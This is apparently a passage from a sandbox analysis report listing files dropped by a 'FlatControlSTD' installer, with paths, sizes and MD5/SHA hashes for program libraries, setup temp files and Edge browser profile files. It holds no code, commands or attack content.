2700189da9f821fb47db86169a88253b4adc8c8c

SHA256
5d2e87b975bfc44db0364b1d053e86dbba4d455bd110be86d43041c9e1aeb0a1

SHA512
281bec21fe2e78f4f145176b672c1e4c48292aa9aa48588c73d45fb22ad91ecd7de4c73e034969a13c029cd78642b95e174c002c39cfafb15994d3d4c9832c7b

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\is-PSVF2.tmp

Filesize
34KB

MD5
54fd4d387f82fe8018fbf3b5996ccfd0

SHA1
1d84fcda4f0c02bd44df8da8aae1aa599be741cd

SHA256
c7c826676443cb9bd62d5cbe03b269f5480e319351fb4d54d75bf66fd4d014f8

SHA512
f1a50a904577fbce9926b8dfb038ae1db0b219dde3b2fe58d271bc310e2d44ed9b701dbe2ed6f5f1c28428d121b1b10f3de710313d7eb2d23316ea57ac2485d4

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\is-R19UD.tmp

Filesize
60KB

MD5
a34d84a36a332a2ccc7f75230326d269

SHA1
14dfbd19b8e596343d60aafd0b7fe6e805319853

SHA256
03baac4f286455f9be401d1b7e16cc02a01ee16fad6d432e542086fb7a933ed9

SHA512
50b0488731984fe3f2faea584d28ca83788415cd71f08a51fe91a637784d56a9cf792ffa7dcbf8cf1e82e43901da7e967848e87337b8420e21dad83532df4843

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\is-S05K5.tmp

Filesize
13KB

MD5
f0a7a1a6f2099e0bb2b2086898448e2d

SHA1
c30ada15445ab6a35b53ccbfbb92027cdef02e21

SHA256
b1552824497fd7a00fb7176a06b58a17d492dc5bee8fde96dbaa8d4ec2c9297b

SHA512
d6a28fa7a52801a8b4ea82e2f3404c573ded8c9c0809696840e27806cdc34d58b97aece5bebe2d573c83aab2361dcd3c352d37f879b2c7db3f4b7da67d0482de

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\is-TR8KG.tmp

Filesize
54KB

MD5
16a591fcfab31c68bb414a2bcb610573

SHA1
403ef9823e926e1b2e9b057a544c451b33e8020e

SHA256
c54df12405240693c71c4490e254232a33a5bd7c6c771f490dbbc28b4273e1ef

SHA512
a778075e1c00fb1e14df2db80fe453c7ec0b941ae500677999ffeba289894127a0df4d607f38fbc559c1c438abc10099f0ec75ce57a7122849c2a7d7163ed042

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\is-UB24L.tmp

Filesize
15KB

MD5
befd36fe8383549246e1fd49db270c07

SHA1
1ef12b568599f31292879a8581f6cd0279f3e92a

SHA256
b5942e8096c95118c425b30cec8838904897cdef78297c7bbb96d7e2d45ee288

SHA512
fd9aa6a4134858a715be846841827196382d0d86f2b1aa5c7a249b770408815b0fe30c4d1e634e8d6d3c8fedbce4654cd5dc240f91d54fc8a7efe7cae2e569f4

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\is-VDUKN.tmp

Filesize
149KB

MD5
3692ad8c9b1fdd1ba9f849d946205e83

SHA1
7d6dc3cace49410036edb759981647bbfb7e981b

SHA256
17d2f49ea32e84747fe75faf3acd8a5900924ccb6ecb5c5ec98fa9d3275c54be

SHA512
111ab6f62fc5a4054a139f5ec84dc3e21487ad79075f29d499e62a596e905715defa25c2fb47497f98d988810e1b31662f4cede1f6675ed561eefdff6727d971

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\lessmsi\is-GQO6U.tmp

Filesize
34KB

MD5
20f055c5657c480d7af56d02cac46760

SHA1
7285f3722b3cd8dd2f5de309c9f021c909c5f4d7

SHA256
859fcb51baccc1de07bf1858c3916b8270c60ceeba23fdbbb24f3ee8f4e82b37

SHA512
27e967bba1e44c00878b5c316412bf1e401804612482c3a5b7476ed7c966b3f78aeb1a537d4063535c19688faf288924f0fbf7a785409dd806b50f2567b4f31f

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\libFLAC_dynamic.dll

Filesize
143KB

MD5
59f2729237186df2d52c705b4a867b19

SHA1
27b743f6fbed1129d699757a8d5d99b4422b8dd2

SHA256
f6c371cd5c2e7d621e8c3d5c204b895f4d058e17ec73bbc362fa5edbecf188fe

SHA512
627cab8fb534d7a9a8a25c5ac21a5d26739111d64904134d47893f5dec6d25d793e688da523b61175682a47eb1daf3dd478af18796d419ec4c1cfca2b9e4a80d

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\libdtsdec.dll

Filesize
57KB

MD5
58798591ff03ac011b8ec71486909ff4

SHA1
b01dace467fe3c3fd4959cd420d7d2d608bc79fe

SHA256
24abc46e6b049c29418ed8d532993acb9e0a61a193dfe4b072cdf009ae0d3e1d

SHA512
a915aaee8e8120e1de44a20f1f037e2e2c94a6dd97a2438c74c6d5f436628b644486346a13b21448cf95e307e448b64f37f6db33adebdf644840214a4e8a2d8a

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\libmp4v2.dll

Filesize
113KB

MD5
df52319897a3e6cfa4b7565bfbba8e72

SHA1
f3dcba6e3f292b785418721b8229304d2331792e

SHA256
b032f88ea44341660d704373244d04842954d00b6f1fdd78dc229b8d699deb27

SHA512
3d41149ea49fd00323b5e7f0bf50caf39a65cd62815faff8bf663c6c9af25636daffc931a304e4ed4bdbcc526bc890e2965619c19c066a3d84dc63334808ac08

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\libsox-3.dll

Filesize
49KB

MD5
eee5c146e02cd0ed3a7f240fa5c3089b

SHA1
18bbaeca7639103179c4d6b75f9665874c599530

SHA256
d5ed0bcc50ca2533edbacc118619e21f49964fbff18d96b20b3b732c30f30b55

SHA512
700e038d66493b07ded31077d5030a43b1013acafe6a5ded72b98c8a8619c4b1248de14442757f27e7c3f950a565cf7107de75f9bcd1f50cc58a47092a8f0deb

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\libsoxr.dll

Filesize
125KB

MD5
789dcbb697e3f42a5816087e692afa36

SHA1
8ee671b42328813004eb998ad76d3a2db184bcb2

SHA256
2be76df664420c821a06868d2755cb1a99fbbf39bf56b865521b083c1c552c2e

SHA512
9664b99d3bcf922a27e394d5143342de659ee60754bc85993fff000d83c7bb633362ab4d31b75bdbc2130ab41ed3d7250d4648438d77046bb8078feee11eb4c6

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\libvorbis.dll

Filesize
105KB

MD5
eb6fdad010c9b48041238e2faf50935a

SHA1
e39876974624aeb685357a6e1302fc66021aae75

SHA256
b0fea274bc0e5277d1bee4d9b7e7b5231ec6e8c208199b8419fc3e904826bc74

SHA512
b542c83716b54cf17b28e50c7bd99f8b0d77616929996e6e4ec5dbbbd9373c6eed4d2350614e244e0a35bd3a76f86d30968d92575f658f346c6617dbd01915f4

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\mp3gain.exe

Filesize
70KB

MD5
7263c49120002b208e996392445b41cc

SHA1
388260386674456c70a2b84b2de5363e65e3178d

SHA256
661fd32db193e738e762e211e2892fb180a8b5c35cf6cd854d037b2b8e203e0d

SHA512
9aca0ab7334da63ff199cae4bab83ce2b668e82af30692b8bdf5d5a91bba0cc6fd68a9c5155a910c8ec0d37220144664daad0717d428ecf334fee585d2226d82

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\opusenc.exe

Filesize
37KB

MD5
b6b87c6f3b5fc7cbc043ce81b1cd1d19

SHA1
51e054f7e65658bb1c3280de789059883a064c4f

SHA256
e3ced5d26195477ac41cb0e18c1391f8a8c30d71f2908da82b90516f8cb7c013

SHA512
05f9e88782e3e6a641aa01543094934f88eb219a8bbdcede9799d1093e448ff872b6dd3940efc658f40b486e96f8472930cd2be04ce7d18c5e7de8104a88eead

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\plugins\internal\is-LGQL7.tmp

Filesize
15KB

MD5
228ee3afdcc5f75244c0e25050a346cb

SHA1
822b7674d1b7b091c1478add2f88e0892542516f

SHA256
7acd537f3be069c7813da55d6bc27c3a933df2cf07d29b4120a8df0c26d26561

SHA512
7dfa06b9775a176a9893e362b08da7f2255037dc99fb6be53020ecd4841c7e873c03bac11d14914efdfe84efeb3fb99745566bb39784962365beebdb89a4531b

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\plugins\internal\is-PTISR.tmp

Filesize
25KB

MD5
b82364a204396c352f8cc9b2f8abef73

SHA1
20ad466787d65c987a9ebdbd4a2e8845e4d37b68

SHA256
2a64047f9b9b07f6cb22bfe4f9d4a7db06994b6107b5ea2a7e38fafa9e282667

SHA512
c8cafa4c315ce96d41ad521e72180df99931b5f448c8647161e7f9dca29aa07213b9ccef9e3f7fb5353c7b459e3da620e560153bdba1ab529c206330dbd26ff5

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\rg_ebur128.dll

Filesize
42KB

MD5
b162992412e08888456ae13ba8bd3d90

SHA1
095fa02eb14fd4bd6ea06f112fdafe97522f9888

SHA256
2581a6bca6f4b307658b24a7584a6b300c91e32f2fe06eb1dca00adce60fa723

SHA512
078594de66f7e065dcb48da7c13a6a15f8516800d5cee14ba267f43dc73bc38779a4a4ed9444afdfa581523392cbe06b0241aa8ec0148e6bcea8e23b78486824

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\sqlite3.dll

Filesize
138KB

MD5
4c94f304496cc60abaf84a766ab3f484

SHA1
e9ac957f897704068e43afad133441b301868cfa

SHA256
7c4256f4dc0c4e971a2842e465a0f0d32474eb88dcc2789be115d66b1ba92cab

SHA512
5c539a2ca31c836abab80282d21281c9f20d8fbbc8592e267aba00f39433978f15e8f2696b98d2672dfa05da5cb75020c884e82dc14b8d6ec4963f8dfe4b8bfc

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\uchardet.dll

Filesize
91KB

MD5
53fbec3dc77f32f6fea7c4052e65a74e

SHA1
66840f7ada251a39e5d42d69b19bf2c9a6834481

SHA256
a60b2fef4be7573c7f720fc9fb480851b3ba6be282f189eac383d69ba45abe0d

SHA512
6a12bc4d939b5ded5fc61c226833c2402ad920d9b58d804cd27f47e2b06310059b35bf2354799769487623270e865d537326cf7e40cd5ce9ccb9fedf5d932085

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\utils.dll

Filesize
13KB

MD5
9c55b3e5ed1365e82ae9d5da3eaec9f2

SHA1
bb3d30805a84c6f0803be549c070f21c735e10a9

SHA256
d2e374df7122c0676b4618aed537dfc8a7b5714b75d362bfbe85b38f47e3d4a4

SHA512
eefe8793309fdc801b1649661b0c17c38406a9daa1e12959cd20344975747d470d6d9c8be51a46279a42fe1843c254c432938981d108f4899b93cdd744b5d968

Download Submit
C:\Program Files (x86)\FlatControlSTD\bin\x86\wavpackdll.dll

Filesize
40KB

MD5
277c445f3559db42ca40511f1be7df2c

SHA1
a450d353409455a5e4c6a9343badf0c6685cb260

SHA256
eb16998b46152a8d981e81d729a29f310846be186b9e78dc08a6720be9c708ba

SHA512
2de4be6bf3b18d4e46a943b0083b476d26d1f53bb3bfdc5593c5991f92ed5f3711653d5931bf128ddaa28e3f5f36500245a9ea9f318ad7fd43ee8fb75f4d8397

Download Submit
C:\Program Files (x86)\FlatControlSTD\fcontrolstd.exe

Filesize
176KB

MD5
63f2777d416b970af001a3182464043e

SHA1
14440ea382abf1e6eb7b04d0dc7139da1bdede4c

SHA256
b0b96466b55f226974e980c6f251fc144b8091814c4b095800592759e1abf869

SHA512
173431d7ac83b4e54fa191b3274a722285d2d61b10716254b8e459e42475be1a23132e2354d939fdc8bd96f5838ccc408b26c58569d6802afef01ad65c6f1b91

Download Submit
C:\Program Files (x86)\FlatControlSTD\fcontrolstd.exe

Filesize
53KB

MD5
cff71f925965c1111bdcd2941be1339d

SHA1
27449fc7b2654319fdc1c376bdc17bdaab9e6490

SHA256
8a78d6b15fec2d3170fc49daeb9bb68c3e25c858d5f4abe9d4f64528edcdfc69

SHA512
f193a34e8f378995fdce7bbc0e1e36217fa376f4ce39ed7e33a3393a2f0901c79ac544296a65be80a9a41a1de2fd1ae21770f7a2c60d2b17c661bd80b597965e

Download Submit
C:\Program Files (x86)\FlatControlSTD\is-D2MTI.tmp

Filesize
124KB

MD5
f85a2625cec36fcd88dcf6c627cde40f

SHA1
35d854c94f3307b7beaf600ea378b6a423c24f61

SHA256
2a0cb38b6861dde44f0fce9b91685eb53e2698fece80589b25ffe7d43e293e20

SHA512
8168f69379877671c069fad766684ff38aa28017f6afeb0998ee497fedfc85fbb17c1c0bd2cbe69981701af5efaa7745a7e6dc55c331aa720728b39267580202

Download Submit
C:\Program Files (x86)\FlatControlSTD\stuff\is-5UFT5.tmp

Filesize
1KB

MD5
28b24c8707bfe42f25ed708291329bb3

SHA1
7d6400603bdbf231e3875c12413cb4c5fba9a6cc

SHA256
daba38c99389d7aae2438cc9eac889c862233e6102f8e2d5a4d7a8ab476e3020

SHA512
b26da427068682bcad0bd868af8e93a95237f37bfcf6905c2c017a25a702ef5f319402a481cb8d84c8cc028bf514e286d71c2f47699cf3b98ab131f92fdbded2

Download Submit
C:\Program Files (x86)\FlatControlSTD\stuff\is-V5TO3.tmp

Filesize
1KB

MD5
257d1bf38fa7859ffc3717ef36577c04

SHA1
a9d2606cfc35e17108d7c079a355a4db54c7c2ee

SHA256
dfacc2f208ebf6d6180ee6e882117c31bb58e8b6a76a26fb07ac4f40e245a0cb

SHA512
e13a6f489c9c5ba840502f73acd152d366e0ccdd9d3d8e74b65ff89fdc70cd46f52e42eee0b4ba9f151323ec07c4168cf82446334564adaa8666624f7b8035f3

Download Submit
C:\Program Files (x86)\FlatControlSTD\unins000.dat

Filesize
8KB

MD5
af1e91b946ae50eb1b4fb1a6f8fc9b7b

SHA1
51b60f635b257bc51cb0077ab251eb15c26006de

SHA256
9d0f08f2940cf5ffdd324d45903da23ed5470e86485e1f3a7326243e22fd2669

SHA512
3579555659764c97931cb36ea6eaaa33de565a0f9d51628c3ded0fef5ca0dff7e9c5896e11ecbd01c40cfb21bf31cb867d9c4b7b0f007b40ecf4229997626c79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\StringIds.exe.log

Filesize
1KB

MD5
2cd056bf2cb201147013842c7e70bd08

SHA1
f01f285a3c8121db0bd64d58055838afbd8f44bd

SHA256
c2c2e2f3f8dcf510d1e8e328f3f62ed24f84a8215d70afbb617555ba61e38188

SHA512
2b48b94968755359603c3726c1ae6eefe0b93b6d7ca82db4cc79f991701b82c01de68e6dcb82677e7b79207a907b88c3cc94f9285bebaf87a3d4fdb06eba8b75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
92e040d7c1eeb7646714b53e4a95eb91

SHA1
4eaae5706d13b5f0ca9f2e4c994cfca63890dd7d

SHA256
5342d5a6f08451e0f1c54f8e3658dd91eeba2be804f3582ddf8d6a4e2d0c6468

SHA512
e5b4c0ee79b7536679bf2e54f865f91b4957d4f66e498a026b88a6c14a13163f897f54baa9da747c1523eaf20d29cca960b8949a08a7b0ab9b0bbe92478a34f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6c6e6aab5327285dca72dfa3f8695741

SHA1
0ac0a9d43cf9dc7b2776c715ec8cb15630a4523a

SHA256
0959ec2fd96c322f7c1b2796b02e49951f26a8502517c7caa9937633c5b55fa0

SHA512
7f0881ee5a766a67239caa09315b7f971f3f21bf457cfd022280babd51c4de75e5d238670767fb0636e641e3f3ba17a872d8edc372abd68940d89d61e008eb5e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0c0f73ef8d2c8b99b9013c92c4ea7a8f

SHA1
3f6457260c34b4d69b15d6c9b895e9de1ae8e8c2

SHA256
0addc15d2db43b0f7bce73525294c298683784dd53229a196beb0bcf79c053b5

SHA512
b138aa56b8ec08c42d18aef8cc9751df29e55075add4ede0371fe110d266643000f51dd8813b172f0ab67ac5430206bea1f221bba431c1ee93d8f03933d0eadb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
147a1340ce886a69713db54160359c8a

SHA1
0dab272dd474d3806a1440b2cf306d1e14bd318e

SHA256
83b165750c9f5a88aed1d3148a723c38336677db427760925662ad253314cdf1

SHA512
1590239174c10018f527ee43b2acf1010c139f40009c3fa622d0f21a851f99a00a80718a20631fc17e1cba37cb580ca40beec90f88d3d2f551eb1def81162bb5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
b83e449117982b998188f4e4a2d88259

SHA1
fc7a1626a87f891494b525b559e408c7cabc4637

SHA256
68dd023b466c375991444babab2b91eaa57f0b6cf0f50c05b419661f01a78994

SHA512
882e7ae82bfbcf031e070144eb0beeeafdcae1b801b07ab89ffb0cb879ee9911a25b440b43b063b7a82abfc498b20dbbf41973f889c5bb06c0d584249b0763c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c879437833ab4a9769b75c60e5d12a40

SHA1
07f283102701033a4ff3b9588c768f49f537ac53

SHA256
a5c51fa91b38fcef6467d9e70c8b1866beb0f4bc181a8e429ef6c68cf6bc3f46

SHA512
e324a21d42540392c15037e9e4a4ba48f4b41e59da963aad030de0830bc70f8a854540c336f2f0317a7beeb94ae442f46ffaf6a1cc64510fd88d9b7d5e7932a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
68aab1f730bee63431d155a5eab81a94

SHA1
9652dd8a85635ef15f6f8e493fd001eef95567fc

SHA256
bddc08267b4d01ffc9135396859f5b8b86b99a8f63cbbd6ebe0c6a435a929a75

SHA512
061de4759028d519183275d7346488efe751464cc6a56224abef97203c3b2b02df3ef6b0499f793751d6ed9659fdbda44c045d3d7e7a72ccb9fcf40cf9f64950

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
7f507f8ac445a58ab9b98f4fabfe9859

SHA1
46c8aaeffededfd8e7d8e42e00f808fea0e21b83

SHA256
c848f62365eaf92e9813815910ebfe24ec714e5cfeb4d12e3472d846387053e4

SHA512
d2979fb9ded0c4f36a39bf3f1a3413624c63e957701bf6b5bdff3cfe02a99653d87229250a29bd4373a48f347499f5a8abb3a738282be9d0ec052dd7f2384f19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
72632ddff8560510c8cb3b276bf2772f

SHA1
33883a0d960db51b5aa9d826f0d9a5af6f262bda

SHA256
7e156fd5cd1f2b69a4ae1413a6772da108fc6be7a22c4e62854f712aac6b21d6

SHA512
16e195daa583a8d81e5d3de95be79a217c314548e4aa967ab8a7053b64ee7c6f9ae7a8f388e3f3e30d05df4251d4fcf7de20fdee06472dc1bb080a85e3773a7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
8KB

MD5
163997bc22b84b29ea5d547dfc485202

SHA1
f7c29466cb441cc71b8a43ce5aae8486066cbbfe

SHA256
f8b291f2eea61fda067f40cc23982bc320d609988110be6a7030ccc9f3390bb0

SHA512
8b1866cc9690cf4d9b852075ef6d52b8cd89ca5c5ac69d50e51c76b00a1da138f6b38e3e189f76a9d6df4c511a1f94d2b8e63e461471af6cfb436bbca5a9920c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
5dab420f11c1d4d52153f11f92fcb6b2

SHA1
21e1dda077e40e3c1c6c7595ea249310e81a0b97

SHA256
dfd5a02e865012c572df6661cdd8d81d0a930ee0b7b125be9195f6d4aca9e07d

SHA512
e906b3c0e6899ead968f84793b320bfd9ae14239e6efe64ccba5263bad3d0d19d2f15723e6c6968a1fde339a5272ca385730dda7e51f90c46642381c1b877a4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
25KB

MD5
58e2b179dbb10d049fe23616966bfb2a

SHA1
b4f722b7e798fb6347837b51b05a4314a8219d84

SHA256
cb934e662ce5441a1fec40f63ddb8b828d7cf0f4a532712907064b377d2777c4

SHA512
ef3fbdd259151b0695369fae632106d190d2b9ac20b9854c5d2c23359ffde9469ea1736e7079264fd739ef3a214ac6ac8dbb9ab6c49184e5b5ebf9b8341c0c9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
89B

MD5
76d599c2a665d1880fc93d7306c2dace

SHA1
b85db6e6e9135e54eabf64cbbb434ef953ed3d28

SHA256
5b4c7e38f1fac86e08d2123a5d4bf5cec82fafca164cd8ab76087a89d0c0654b

SHA512
fd77c3e3b54b4aaab2ac819243a23aca098d67ccc09b4421bc7f5628c62f7c18d6ef4a9e5271e0a660cb3c72743369188e7f857c3c537c5a53562dfa9f3016e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
69675184e495f8cb8c60c8c179bd7c41

SHA1
385ae3e08cf38029c934730af2d5b7907227d4af

SHA256
97f4dcf8953da4041ff59b910bfbea5d5e599644fec67cfc7972b43e68bf9d06

SHA512
7cd4da926d2d83ad151d8593939d730353c6271a427ea9fdcbeb82c354f51428de1eb7ebb5835b263e6d2ecbf48ae17abee7732587fac122bd329fd66e5b369e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
02cc44d6d8f6fce85b0124dc15bd21a0

SHA1
565f28e52048232bdcc716c4f87fb6d9eb3fee0f

SHA256
f48fa03369defa75177e46723cecab6d79ae88d7e2f90c1bc8bbac9ce36bc1c1

SHA512
66ce75ccbf7f2cecf5da731e98fe3ae5b58c61f42c3b26882cd8ca0091822f8e59faead448debe00cddbf6d03f2130046718bbf64a105f351a3544f0d7570944

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
c0a45daa65f5845c6286a13cc29348e4

SHA1
8118831b735da8468492a8782138ca32b5dd31d0

SHA256
a10f4a544434188ea74863b4d16e36aa88650bdf1c833977b32cd1086324c241

SHA512
47d875ad9fdb675ccdb011a0b38ead7c65c98483c23c62179a30a22b8c22724523dacba174309a7f2e835a487b6b22bf75b66635421c07b7a28ea962b9b32793

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5d2b29.TMP

Filesize
1KB

MD5
ddb9933f3c7ca7c72dec7183f838b7e9

SHA1
cb6f356f328592235d4dde94a7fcb4ad823b7170

SHA256
ff4590624f36655649422c8ee96dd761aabc1fc8f8ff4e77be4e78e0d07d830c

SHA512
9ec93ff85f9aa27e44d2acbe43453a139d9c722be57291252698499045105972dbabcc25dc4cf825fdf3f37eac2b86531bac9274f1b20217ba53dc203d650ae7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e8b348cd-b6f3-40c2-9eef-96cfc8b3a8fc.tmp

Filesize
1KB

MD5
6995362752b7fd4ee4408b3b585e8ce4

SHA1
a16d7a6c93634a7827fbd4ee613e2130400d2703

SHA256
83c52f443b31c7cb98b76461c96ff78cdea18e219961d886abfad9e810239e28

SHA512
f4c3aaf94e31d45bcb0c9b5ee998635ef6e70a92594c10f9e9f911251bf7d318f675b4b825b2d154bce25f7c2bf44e51a3ef80bd0ada4bffb0e66b7134d91b5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
e3403f082d68fb1560ff69a0312a4049

SHA1
0524e3366c2b0f67c3cec09c544c44c639db5566

SHA256
f6675895f71e4af84ecd90f655855e6d3cc303b2c7812b263fb846ec7ab31cdf

SHA512
7a3a290b14eaf6dd5db8796c922ab3773ca2860d1453589270138096f4fe21f6813fe472de01485308cb57af49e34c72b8514fa0aa7f0768df732b18e5c71170

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
191dabf39396c9804008ce202a36b107

SHA1
fd1f788115268d7490814ec8224863dba562de04

SHA256
1d3fe13bb44421a3a5c870d0f4ffe3e0873809bcb628850a36aaa0dddd8a522c

SHA512
0059629b85a966d6488295e012e5473a1a8562b837878a8ff369b0c185b4b6eb69efaccd0965f3a298060bcfe2f5bf395e443a2e370346ce0d08d7c59ce3c027

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
9e1802f29581a8545a3183c1381af658

SHA1
6f603929bde6e2e80038c4b4066abe6c08355a88

SHA256
d12af138e9c35eab5528671de250267dc7675e2f70892d1c4bbcd8efc4c00513

SHA512
084692d0115215f96f996e0d8798f30637a5dcd637f5d7ce0c4121afec40d18e506acab9e2978f278a0dcfced9edbf01067cffe0ba0ca99079d7f4d9abb6b5b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
a5aa29236e022c7956ad1e1c21dc90ce

SHA1
3b220c522c3d6228734583ed46dbd5c025958663

SHA256
3ae07598e91b705fae70b62e25442b2c2663ea2ac61342321bbe09bb37006fe2

SHA512
d3f56dd4b6939af5b2eff0008f01f0a3c5cdeb1dead93248067e373146d7f96135e9edd631c6d4cca79086405cf9b5f9aabb2e5536d7d62d69497a11c5a6065d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
2KB

MD5
a8a8b09a7fee5e1c7e79dba6a10d1c69

SHA1
4e47bb3f93ee1b50694969b3a9377f65595c6bb3

SHA256
f191ecf8d0dce9c59c00c56ec54fced7c261f3927e53bbf53b138189269f396a

SHA512
8989b9648adb4679caa8e3c4340dd829a224e50141a5a926b6454316fe569abdbf4eb5530ead8d8000e68ee6af5bf30779ec66ae013469f58d3ac95b68ffba9d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c81875dd6191ff834986412a877e66ff

SHA1
e65b4a3745377c949122d1de2d40bfc7526ec96d

SHA256
62a490d2ba8d3668fc883dc966abeafaa31e50febc9292645caad33d900f042a

SHA512
31986991a0c033327d982b148b297dcde3bfd5803cfdd906938e5675e2b1fbdf8cfed3cedb2454bd6b1d077e25fa7c17bbd8d4ebb7ddbf17b1b9f463aa56cd8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
fdf50db9a6942ce0fac342d48476552a

SHA1
b22641b92b94f7a99e13e5a44c2faa712bdd1cf1

SHA256
0267259c23264786e1f85c07ff11dbb107f8e57abd508c65c21ee0f7f90e4f47

SHA512
7d6997f07c6dfcd838c19e1724314322ec696abfc9458684213228dbb7a5d70642d56a41be2d32711843ab60511fe2b3f78e2b25edf49494dbd8bac47a6fa279

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
4c6f5621ae7db5224ba31c8e751a56a8

SHA1
4f6c6c9099133fe6d6a72b8c6aa315ded2d34fc3

SHA256
ccd079d4071011f39d3000f5068fdbfcf070d8237a618194602c6df08fa5f02b

SHA512
a9edce3a1ad7cea055c565cd0c0005bb1e2023c6d7933abc822efb7d94d81e5a8e9027255d9d3dc86dd39e4336bf2f7512cc486a2467d0838b07b0869bd43421

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
3KB

MD5
63731d0e3df1dd6c8debf747291a0a7c

SHA1
d4d6e1fd4b6a765a98a1b8f03a5f86747e923ffe

SHA256
0aaf9eb8a424b1a8c440143d2335b6177d733a56eba6892dc6ed4c509b3b454d

SHA512
d737d73c0d30163fd011286e0c9d91b2eccfdc99808036ddf4fc3ecfe6d94052834fac024ccbaa734852b803b93a9fa00955b3b1455862c3194bcc0aad7e8faf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
64KB

MD5
